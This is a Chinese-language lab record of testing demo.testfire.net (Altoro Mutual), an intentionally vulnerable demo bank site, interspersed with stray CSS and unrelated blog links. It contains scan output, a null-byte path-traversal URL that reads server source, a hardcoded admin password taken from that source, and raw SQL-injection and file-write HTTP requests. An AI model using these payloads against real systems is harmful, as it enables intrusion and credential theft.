demo.testfire.net

span::selection, .CodeMirror-line > span > span::selection { background: #d7d4f0; }.CodeMirror-line::-moz-selection, .CodeMirror-line > span::-moz-selection, .CodeMirror-line > span > span::-moz-selection { background: #d7d4f0; }.cm-searching {background: #ffa; background: rgba(255, 255, 0, .4);}.cm-force-border { padding-right: .1px; }@media print { .CodeMirror div.CodeMirror-cursors {visibility: hidden;}}.cm-tab-wrap-hack:after { content: ""; }span.CodeMirror-selectedtext { background: none; }.CodeMirror-activeline-background, .CodeMirror-selected {transition: visibility 0ms 100ms;}.CodeMirror-blur .CodeMirror-activeline-background, .CodeMirror-blur .CodeMirror-selected {visibility:hidden;}.CodeMirror-blur .CodeMirror-matchingbracket {color:inherit !important;outline:none !important;text-decoration:none !important;}.CodeMirror-sizer {min-height:auto !important;}
-->
li {list-style-type:decimal;}.wiz-editor-body ol.wiz-list-level2 > li {list-style-type:lower-latin;}.wiz-editor-body ol.wiz-list-level3 > li {list-style-type:lower-roman;}.wiz-editor-body blockquote {padding: 0 12px;}.wiz-editor-body blockquote > :first-child {margin-top:0;}.wiz-editor-body blockquote > :last-child {margin-bottom:0;}.wiz-editor-body img {border:0;max-width:100%;height:auto !important;margin:2px 0;}.wiz-editor-body table {border-collapse:collapse;border:1px solid #bbbbbb;}.wiz-editor-body td,.wiz-editor-body th {padding:4px 8px;border-collapse:collapse;border:1px solid #bbbbbb;min-height:28px;word-break:break-word;box-sizing: border-box;}.wiz-hide {display:none !important;}
-->

信息搜集

域名

http://demo.testfire.net

IP 端口信息

65.61.137.117

65.61.137.117

nmap 信息

root@kali:~/security_tools/recon_tools/gwhatweb# nmap -Pn -A 65.61.137.117
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-18 02:22 EDT
Nmap scan report for 65.61.137.117
Host is up (0.60s latency).
Not shown: 995 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.0
| http-cookie-flags:
| /:
| amSessionId:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.0
|_http-title: Altoro Mutual
443/tcp open ssl/http Microsoft IIS httpd 8.0
| http-cookie-flags:
| /:
| amSessionId:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.0
|_http-title: Altoro Mutual
| ssl-cert: Subject: commonName=demo.testfire.net
| Not valid before: 2014-07-01T09:54:37
|_Not valid after: 2019-12-22T09:54:37
|_ssl-date: 2018-08-18T07:23:19+00:00; +58m04s from scanner time.
445/tcp filtered microsoft-ds
514/tcp filtered shell
4444/tcp filtered krb524
Device type: general purpose
Running: Microsoft Windows XP|7|2012
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012
OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 58m03s, deviation: 0s, median: 58m03s

TRACEROUTE (using port 1723/tcp)
HOP RTT ADDRESS
1 5.10 ms 192.168.245.2
2 26.32 ms 65.61.137.117

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 183.49 seconds

root@kali:~/security_tools/recon_tools/gwhatweb# nmap -Pn -A  65.61.137.117

Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-18 02:22 EDT

Nmap scan report for 65.61.137.117

Host is up (0.60s latency).

Not shown: 995 closed ports

PORT     STATE    SERVICE      VERSION

80/tcp   open     http         Microsoft IIS httpd 8.0

| http-cookie-flags:

|   /:

|     amSessionId:

|_      httponly flag not set

| http-methods:

|_  Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.0

|_http-title: Altoro Mutual

443/tcp  open     ssl/http     Microsoft IIS httpd 8.0

| http-cookie-flags:

|   /:

|     amSessionId:

|_      httponly flag not set

| http-methods:

|_  Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/8.0

|_http-title: Altoro Mutual

| ssl-cert: Subject: commonName=demo.testfire.net

| Not valid before: 2014-07-01T09:54:37

|_Not valid after:  2019-12-22T09:54:37

|_ssl-date: 2018-08-18T07:23:19+00:00; +58m04s from scanner time.

445/tcp  filtered microsoft-ds

514/tcp  filtered shell

4444/tcp filtered krb524

Device type: general purpose

Running: Microsoft Windows XP|7|2012

OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2012

OS details: Microsoft Windows XP SP3, Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012

Network Distance: 2 hops

Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:

|_clock-skew: mean: 58m03s, deviation: 0s, median: 58m03s

TRACEROUTE (using port 1723/tcp)

HOP RTT      ADDRESS

1   5.10 ms  192.168.245.2

2   26.32 ms 65.61.137.117

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 183.49 seconds

中间件

root@kali:~/security_tools/file_scan/dirsearch# whatweb http://demo.testfire.net/
http://demo.testfire.net/ [200 OK] ASP_NET[2.0.50727], Cookies[ASP.NET_SessionId,amSessionId], Country[UNITED STATES][US], HTTPServer[Microsoft-IIS/8.0], HttpOnly[ASP.NET_SessionId], IP[65.61.137.117], Microsoft-IIS[8.0], Title[Altoro Mutual][Title element contains newline(s)!], X-Powered-By[ASP.NET]

root@kali:~/security_tools/file_scan/dirsearch# whatweb http://demo.testfire.net/

http://demo.testfire.net/ [200 OK] ASP_NET[2.0.50727], Cookies[ASP.NET_SessionId,amSessionId], Country[UNITED STATES][US], HTTPServer[Microsoft-IIS/8.0], HttpOnly[ASP.NET_SessionId], IP[65.61.137.117], Microsoft-IIS[8.0], Title[Altoro Mutual][Title element contains newline(s)!], X-Powered-By[ASP.NET]

总结

windows 服务器， asp.net (aspx) . iis8
靶机网站，域名， cdn 等信息无需搜集

漏洞挖掘

错误日志，泄露物理路径

GET 请求访问 http://demo.testfire.net/comment.aspx

An Error Has Occurred

Summary:

Value cannot be null.

Error Message:

System.ArgumentNullException: Value cannot be null. Parameter name: input at System.Text.RegularExpressions.Regex.IsMatch(String input) at System.Text.RegularExpressions.Regex.IsMatch(String input, String pattern) at Altoro.comment.writeToFile(String file, String name, String email_addr, String subject, String comments) in c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31 at Altoro.comment.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 27 at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) at System.Web.UI.Control.OnLoad(EventArgs e) at System.Web.UI.Control.LoadRecursive() at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)

疑似程序路径

c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31

c:\downloads\AltoroMutual_v6\website\comment.aspx.cs:line 31

登录处无验证码（ maybe 暴力破解）

http://www.altoromutual.com/bank/login.aspx

任意文件内容读取

查看 login.aspx 的源代码

http://demo.testfire.net/default.aspx?content=../bank/login.aspx.cs%00.txt

给出不存在的文件会报出目录信息

Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'
System.IO.FileNotFoundException: Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'.
File name: 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'
at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)
at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)
at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)
at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize)
at System.IO.StreamReader..ctor(String path)
at System.IO.File.OpenText(String path)
at Altoro.Default.LoadFile(String myFile) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 42
at Altoro.Default.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 70
at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)
at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)
at System.Web.UI.Control.OnLoad(EventArgs e)
at System.Web.UI.Control.LoadRecursive()
at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)

Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'

        System.IO.FileNotFoundException: Could not find file 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'.

            File name: 'C:\downloads\AltoroMutual_v6\website\bank\login.aspx.cs,'

            at System.IO.__Error.WinIOError(Int32 errorCode, String maybeFullPath)

            at System.IO.FileStream.Init(String path, FileMode mode, FileAccess access, Int32 rights, Boolean useRights, FileShare share, Int32 bufferSize, FileOptions options, SECURITY_ATTRIBUTES secAttrs, String msgPath, Boolean bFromProxy)

            at System.IO.FileStream..ctor(String path, FileMode mode, FileAccess access, FileShare share, Int32 bufferSize, FileOptions options)

            at System.IO.StreamReader..ctor(String path, Encoding encoding, Boolean detectEncodingFromByteOrderMarks, Int32 bufferSize)

            at System.IO.StreamReader..ctor(String path)

            at System.IO.File.OpenText(String path)

            at Altoro.Default.LoadFile(String myFile) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 42

            at Altoro.Default.Page_Load(Object sender, EventArgs e) in c:\downloads\AltoroMutual_v6\website\default.aspx.cs:line 70

            at System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e)

            at System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e)

            at System.Web.UI.Control.OnLoad(EventArgs e)

            at System.Web.UI.Control.LoadRecursive()

            at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint)

读取 /admin/login.aspx 的源码拿到管理员的密码

if (this.CodeNumberTextBox.Text == this.Session["CaptchaImageText"].ToString() && this.Password.Value == "Altoro1234")

if (this.CodeNumberTextBox.Text == this.Session["CaptchaImageText"].ToString() && this.Password.Value == "Altoro1234")

SQL 注入

POST /bank/login.aspx HTTP/1.1
Host: demo.testfire.net
Content-Length: 45
Cache-Control: max-age=0
Origin: http://demo.testfire.net
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://demo.testfire.net/bank/login.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASP.NET_SessionId=dtutsf550envk5alwwnkd045; amSessionId=15719430288
Connection: close

uid=hac425%27&passw=%27%27%27&btnSubmit=Login

POST /bank/login.aspx HTTP/1.1

Host: demo.testfire.net

Content-Length: 45

Cache-Control: max-age=0

Origin: http://demo.testfire.net

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: http://demo.testfire.net/bank/login.aspx

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: ASP.NET_SessionId=dtutsf550envk5alwwnkd045; amSessionId=15719430288

Connection: close

uid=hac425%27&passw=%27%27%27&btnSubmit=Login

写文件

貌似只能写 txt , 写 aspx 访问不了

POST /comment.aspx HTTP/1.1
Host: www.altoromutual.com
Content-Length: 111
Cache-Control: max-age=0
Origin: http://www.altoromutual.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://www.altoromutual.com/feedback.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASP.NET_SessionId=pods4fz2zs5fdh55xmwwkg55; amSessionId=21554438004
Connection: close

cfile=comment.txt&name=+hac425&email_addr=11%4011.com&subject=sss&comments=kkkkkkkkkkkkkkkkkkkk&submit=+Submit+

POST /comment.aspx HTTP/1.1

Host: www.altoromutual.com

Content-Length: 111

Cache-Control: max-age=0

Origin: http://www.altoromutual.com

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

Referer: http://www.altoromutual.com/feedback.aspx

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: ASP.NET_SessionId=pods4fz2zs5fdh55xmwwkg55; amSessionId=21554438004

Connection: close

cfile=comment.txt&name=+hac425&email_addr=11%4011.com&subject=sss&comments=kkkkkkkkkkkkkkkkkkkk&submit=+Submit+

demo.testfire.net 靶场测试流程记录的更多相关文章

利用cocoapods管理开源项目，支持 pod install安装整个流程记录（github公有库）
利用cocoapods管理开源项目,支持 pod install安装整个流程记录(github公有库),完成预期的任务,大致有下面几步: 1.代码提交到github平台 2.创建.podspec 3. ...
互联网App应用程序测试流程及测试总结
互联网App应用程序测试流程及测试总结 1. APP测试基本流程 1.1流程图仍然为测试环境 Pass 1.2测试周期测试周期可按项目的开发周期来确定测试时间,一般测试时间为两三周(即15个工作日 ...
web测试流程的总结及关注点
项目的测试流程大只包含的几个阶段:立项.需求评审.用例评审.测试执行.测试报告文档一.立项后测试需要拿到的文档 1.需求说明书 2.原型图(及UI图) 3.接口文档 4.数据库字典(表的数量.缓存机 ...
抓包工具 Fiddler 使用：弱网络环境模拟限速测试流程
转自:http://www.51testing.com/html/80/n-3726980.html 抓包工具 Fiddler 使用:弱网络环境模拟限速测试流程发表于:2018-6-06 11: ...
web手工项目01-系统组织框架-测试流程-需求评审-测试计划与方案
回顾 SVN(定义,作用,使用操作) 软件缺陷(定义,表现形式,原因和根源,基本内容,跟踪流程) JIRA(基本介绍,使用者,工作流,问题,使用) 学习目标掌握WAMP的环境搭建掌握熟悉项目的步骤 ...
APP测试流程梳理
APP测试流程梳理 1 APP测试基本流程 1.1流程图 1.2测试周期测试周期可按项目的开发周期来确定测试时间,一般测试时间为两三周(即15个工作日),根据项目情况以及版本质量可适当缩短或延长测试 ...
【转载】基于RedHatEnterpriseLinux V7（RHEL7）下SPEC CPU 2006环境搭建以及测试流程（之一）——介绍、安装准备、安装、config文件以及运行脚本介绍
基于RedHatEnterpriseLinux V7(RHEL7)下SPEC CPU 2006环境搭建以及测试流程(之一)--介绍.安装准备.安装.config文件以及运行脚本介绍其他 2018-0 ...
ltp 测试流程及测试脚本分析
LTP介绍 (2011-03-25 18:03:53) 转载▼ 标签: ltp linux 压力测试杂谈分类: linux测试 LTP介绍一.LTP介绍1.简介LTP(Linux Test Pr ...
【腾讯优测干货分享】如何降低App的待机内存（二）——规范测试流程及常见问题
本文来自于腾讯优测公众号(wxutest),未经作者同意,请勿转载,原文地址:https://mp.weixin.qq.com/s/806TiugiSJvFI7fH6eVA5w 作者:腾讯TMQ专项测 ...

随机推荐

POJ 1154
#include<iostream> #include<stdio.h> #define MAXN 20 using namespace std; int DFS(int i, ...
Windows server 2008 R2 安装AD域证书
参考文档: http://blog.51cto.com/gaowenlong/1969585 http://blog.51cto.com/gaowenlong/1969586 安装后打开证书颁发机构 ...
zabbix数据库表结构解析
下面开始介绍: 1.添加监控表结构详解 (1)hosts,存储被监控的机器的信息,表结构如下: (2)items (3)hosts_templates,存储机器和模版或者模版和模版之间的关系由于模 ...
js with 语句的用法
with 语句为语句设定默认对象. with (object) statements 参数 object 新的默认对象. statements 一个或多个语句,object 是该语句的默认对象 ...
[C语言]声明解析器cdecl修改版
一.写在前面 K&R曾经在书中承认,"C语言声明的语法有时会带来严重的问题.".由于历史原因(BCPL语言只有唯一一个类型——二进制字),C语言声明的语法在各种合理的组合下 ...
lucene源码分析(1)基本要素
1.源码包 core: Lucene core library analyzers-common: Analyzers for indexing content in different langua ...
npm run build之后生成的dist如何扔到服务器运行（npm run build之后如何本地运行）
运行npm run build之后,会生成一个dist文件夹,里面的目录结构大概是这样的: 生成完的文件我们怎么来运行呢?直接在本地打开inde.html是无法运行的,打包的时候有提示: 构建文件应该 ...
sql中根据逗号分隔，查出多行数据
--sql中根据逗号分隔,查出多行数据 select a.DiscussID,b.LocationID from (select DiscussID,LocationID=c ...
C学习笔记（2）--指针
一.多文件结构总结 1.子源文件里面包含自己对应的头文件 2.无论是何源文件调用库函数,都需要包含该库函数的声明所在的头文件 3.头文件又叫接口文件,.c对数据和函数进行封装和包含, .h就是.c对外 ...
C#关于操作符重载与转换
随便写写首先,假设我们有一个Person类型其类型定义如下 class Person { public string Name { get; set; } = "Person" ...

demo.testfire.net 靶场测试流程记录